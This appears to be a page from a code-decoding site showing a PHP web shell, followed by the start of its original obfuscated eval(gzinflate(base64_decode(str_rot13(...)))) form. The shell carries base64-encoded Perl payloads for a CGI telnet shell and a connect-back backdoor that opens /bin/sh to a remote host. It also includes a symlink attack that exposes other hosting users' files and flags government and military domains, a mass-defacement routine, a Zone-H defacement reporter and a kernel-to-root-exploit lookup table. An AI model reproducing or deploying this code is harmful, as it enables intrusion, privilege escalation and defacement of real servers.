cnJlbnREaXIgPSBgJENtZFB3ZGApIGlmKCRDdXJyZW50RGlyIGVxICIiKTsNCg0KJExvZ2dlZElu
ID0gJENvb2tpZXN7J1NBVkVEUFdEJ30gZXEgJFBhc3N3b3JkOw0KDQppZigkQWN0aW9uIGVxICJs
b2dpbiIgfHwgISRMb2dnZWRJbikgIyB1c2VyIG5lZWRzL2hhcyB0byBsb2dpbg0Kew0KCSZQZXJm
b3JtTG9naW47DQoNCn0NCmVsc2lmKCRBY3Rpb24gZXEgImNvbW1hbmQiKSAjIHVzZXIgd2FudHMg
dG8gcnVuIGEgY29tbWFuZA0Kew0KCSZFeGVjdXRlQ29tbWFuZDsNCn0NCmVsc2lmKCRBY3Rpb24g
ZXEgInVwbG9hZCIpICMgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlDQp7DQoJJlVwbG9hZEZp
bGU7DQp9DQplbHNpZigkQWN0aW9uIGVxICJkb3dubG9hZCIpICMgdXNlciB3YW50cyB0byBkb3du
bG9hZCBhIGZpbGUNCnsNCgkmRG93bmxvYWRGaWxlOw0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAibG9n
b3V0IikgIyB1c2VyIHdhbnRzIHRvIGxvZ291dA0Kew0KCSZQZXJmb3JtTG9nb3V0Ow0KfQ==';
$file = fopen("izo.cin" ,"w+");
$write = fwrite ($file ,base64_decode($cgishellizocin));
fclose($file);
chmod("izo.cin",0755);
$netcatshell = 'IyEvdXNyL2Jpbi9wZXJsDQogICAgICB1c2UgU29ja2V0Ow0KICAgICAgcHJpbnQgIkRhdGEgQ2hh
MHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQogICAgICBpZiAoISRBUkdWWzBdKSB7DQog
ICAgICAgIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogICAgICAgIGV4aXQo
MSk7DQogICAgICB9DQogICAgICBwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KICAg
ICAgJGhvc3QgPSAkQVJHVlswXTsNCiAgICAgICRwb3J0ID0gODA7DQogICAgICBpZiAoJEFSR1Zb
MV0pIHsNCiAgICAgICAgJHBvcnQgPSAkQVJHVlsxXTsNCiAgICAgIH0NCiAgICAgIHByaW50ICJb
Kl0gQ29ubmVjdGluZy4uLlxuIjsNCiAgICAgICRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3An
KSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0KICAgICAgc29ja2V0KFNFUlZFUiwgUEZf
SU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCiAg
ICAgIG15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KICAgICAgaWYgKCFjb25uZWN0KFNF
UlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogICAgICAgIGRpZSgi
VW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBTcGF3bmlu
ZyBTaGVsbFxuIjsNCiAgICAgIGlmICghZm9yayggKSkgew0KICAgICAgICBvcGVuKFNURElOLCI+
JlNFUlZFUiIpOw0KICAgICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgICAgICAgb3Bl
bihTVERFUlIsIj4mU0VSVkVSIik7DQogICAgICAgIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAu
ICJcMCIgeCA0Ow0KICAgICAgICBleGl0KDApOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBE
YXRhY2hlZFxuXG4iOw==';
$file = fopen("dc.pl" ,"w+");
$write = fwrite ($file ,base64_decode($netcatshell));
fclose($file);
chmod("dc.pl",0755);
echo "<iframe src=cgitelnet1/izo.cin width=100% height=100% frameborder=0></iframe> ";
echo '</div>';
printFooter();
}
function actionSymlink(){
printHeader();
echo '<form action="" method="post">';
@set_time_limit(0);
echo "<center>";
@mkdir('sym',0777);
$htaccess = "Options all
DirectoryIndex readme.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any";
$write =@fopen ('sym/.htaccess','w');
fwrite($write ,$htaccess);
@symlink('/','sym/root');
$filelocation = basename(__FILE__);
$read_named_conf = @file('/etc/named.conf');
if(!$read_named_conf)
{
echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
}
else
{
echo "<br><br><div class='tmp'><table border='1' bordercolor='#FF0000' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
foreach($read_named_conf as $subject){
if(eregi('zone',$subject)){
preg_match_all('#zone "(.*)"#',$subject,$string);
flush();
if(strlen(trim($string[1][0])) >2){
$UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
$name = $UID['name'] ;
@symlink('/','sym/root');
$name = $string[1][0];
$iran = '\.ir';
$israel = '\.il';
$indo = '\.id';
$sg12 = '\.sg';
$edu = '\.edu';
$gov = '\.gov';
$gose = '\.go';
$gober = '\.gob';
$mil1 = '\.mil';
$mil2 = '\.mi';
if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])
or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0]))
{
$name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>';
}
echo "
<tr>
<td>
<div class='dom'><a target='_blank' href=http://www.".$string[1][0].'/>'.$name.' </a> </div>
</td>
<td>
'.$UID['name']."
</td>
<td>
<a href='sym/root/home/".$UID['name']."/public_html' target='_blank'>Symlink </a>
</td>
</tr></div> ";
flush();
}
}
}
}
echo "</center></table>";
printFooter();
}
function actionDeface(){
printHeader();
echo "<h1>Single User Mass Deface</h1><div class=content>";
?>
<form ENCTYPE="multipart/form-data" action="<?$_SERVER['PHP_SELF']?>" method=POST onSubmit="g(null,null,this.path.value,this.file.value,this.Contents.value);return false;">
<p align="Left">Folder: <input type=text name=path size=60 value="<?=getcwd();?>">
<br>file name : <input type=text name=file size=20 value="readme.html">
<br>Text Content : <input type=text name=Contents size=20 value="musuh utama kita adalah nafsu, munafik dan kafir dalam diri kita, <br><br>- md. l07hdh">
<br><input type=submit value="Update"></p></form>
<?php
if($_POST['a'] == 'Deface'){
$mainpath=$_POST[p1];
$file=$_POST[p2];
$txtContents=$_POST[p3];
echo "-----------------------------------------------<br>
[+] Single user Mass defacer<br>
-----------------------------------------------<br><br> ";
$dir=opendir($mainpath); //fixme - cannot deface when change to writeable path!!
while($row=readdir($dir))
{
$start=@fopen("$row/$file","w+");
$code=$txtContents;
$finish=@fwrite($start,$code);
if ($finish)
{
echo "$row/$file > Done<br><br>";
}
}
echo "-----------------------------------------------<br><br>[+] Script by md. l07hdh ...";
}
echo '</div>';
printFooter();
}
/* test function - reserved by l07hdh */
function actionTest(){
printHeader();
echo '<h1>Testing function</h1><div class=content>';
echo '<br>';
?>
<form action="<?$_SERVER['PHP_SELF']?>" method=POST onSubmit="g(null,null,this.fname.value);return false;">
Name: <input type="text" name="fname" />
<input type="submit" value=">>">
</form>
</br>
<?php
if($_POST['a'] == 'Test') {
$out = $_POST['p1'];
echo "name : $out";
}
echo '</div>';
printFooter();
}
function actionDomain(){
printHeader();
echo '<h1>local domain viewer</h1><div class=content>';
$file = @implode(@file("/etc/named.conf"));
if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
preg_match_all("#named/(.*?).db#",$file ,$r);
$domains = array_unique($r[1]);
//check();
//if(isset($_GET['ShowAll']))
{
echo "<table align=center border=1 width=59% cellpadding=5>
<tr><td colspan=2>[+] There are : [ <b>".count($domains)."</b> ] Domain</td></tr>
<tr><td>Domain</td><td>User</td></tr>";
foreach($domains as $domain){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>";
}
echo "</table>";
}
echo '</div>';
printFooter();
}
function actionZHposter(){
printHeader();
echo '<h1>Zone-H Poster</h1><div class=content>';
echo '<form action="" method="post" onSubmit=da2(null,null,this.p1.value,this.p2.value,this.p3.value,this.p4.value);return true;">
<input type="text" name="p1" size="40" value="Attacker" /></br>
<select name="p2">
<option >--------SELECT--------</option>
<option value="1">known vulnerability (i.e. unpatched system)</option>
<option value="2" >undisclosed (new) vulnerability</option>
<option value="3" >configuration / admin. mistake</option>
<option value="4" >brute force attack</option>
<option value="5" >social engineering</option>
<option value="6" >Web Server intrusion</option>
<option value="7" >Web Server external module intrusion</option>
<option value="8" >Mail Server intrusion</option>
<option value="9" >FTP Server intrusion</option>
<option value="10" >SSH Server intrusion</option>
<option value="11" >Telnet Server intrusion</option>
<option value="12" >RPC Server intrusion</option>
<option value="13" >Shares misconfiguration</option>
<option value="14" >Other Server intrusion</option>
<option value="15" >SQL Injection</option>
<option value="16" >URL Poisoning</option>
<option value="17" >File Inclusion</option>
<option value="18" >Other Web Application bug</option>
<option value="19" >Remote administrative panel access bruteforcing</option>
<option value="20" >Remote administrative panel access password guessing</option>
<option value="21" >Remote administrative panel access social engineering</option>
<option value="22" >Attack against administrator(password stealing/sniffing)</option>
<option value="23" >Access credentials through Man In the Middle attack</option>
<option value="24" >Remote service password guessing</option>
<option value="25" >Remote service password bruteforce</option>
<option value="26" >Rerouting after attacking the Firewall</option>
<option value="27" >Rerouting after attacking the Router</option>
<option value="28" >DNS attack through social engineering</option>
<option value="29" >DNS attack through cache poisoning</option>
<option value="30" >Not available</option>
</select>
</br>
<select name="p3">
<option >--------SELECT--------</option>
<option value="1" >Heh...just for fun!</option>
<option value="2" >Revenge against that website</option>
<option value="3" >Political reasons</option>
<option value="4" >As a challenge</option>
<option value="5" >I just want to be the best defacer</option>
<option value="6" >Patriotism</option>
<option value="7" >Not available</option>
</select>
</br>
<textarea name="p4" cols="44" rows="9">List Of Domains</textarea>
<input type="submit" value="Send Now !" />
</form>';
echo "</td></tr></table></form>";
if($_POST['a'] == 'ZHposter')
{
ob_start();
$sub = @get_loaded_extensions();
if(!in_array("curl", $sub))
{
die('[-] Curl Is Not Supported !! ');
}
$hacker9 = $_POST['p1'];
$method9 = $_POST['p2'];
$neden9 = $_POST['p3'];
$site9 = $_POST['p4'];
if (empty($hacker9))
{
die ("[-] You Must Fill the Attacker name !");
}
elseif($method9 == "--------SELECT--------")
{
die("[-] You Must Select The Method !");
}
elseif($neden9 == "--------SELECT--------")
{
die("[-] You Must Select The Reason");
}
elseif(empty($site9))
{
die("[-] You Must Inter the Sites List ! ");
}
$i = 0;
$sites = explode("
", $site9);
while($i < count($sites))
{
if(substr($sites[$i], 0, 4) != "http")
{
$sites[$i] = "http://".$sites[$i];
}
ZoneH("http://zone-h.org/notify/single", $hacker9, $method9, $neden9, $sites[$i]);
echo "Site : ".$sites[$i]." Defaced ! </br>";
++$i;
}
echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! ";
}
echo '</div';
printFooter();
}
function ZoneH($url9, $hacker9, $hackmode9,$reson9, $site9 )
{
$k = curl_init();
curl_setopt($k, CURLOPT_URL, $url9);
curl_setopt($k,CURLOPT_POST,true);
curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker9."&domain1=". $site9."&hackmode=".$hackmode9."&reason=".$reson9);
curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
$kubra = curl_exec($k);
curl_close($k);
return $kubra;
}
function rootxpL()
{
$v=@php_uname();
$db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace');
foreach($db as $k=>$x)if(strstr($v,$k))return $x;
if(!$xpl)$xpl='<font color="red">Not found.</font>';
return $xpl;
}
/* additional Function */
/* additionanal endsss */
if( empty($_POST['a']) )
if(isset($default_action) && function_exists('action' . $default_action))
$_POST['a'] = $default_action;
else $_POST['a'] = 'SecInfo';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
call_user_func('action' . $_POST['a']);Did this file decode correctly?
Original Code
<?php eval (gzinflate(base64_decode(str_rot13("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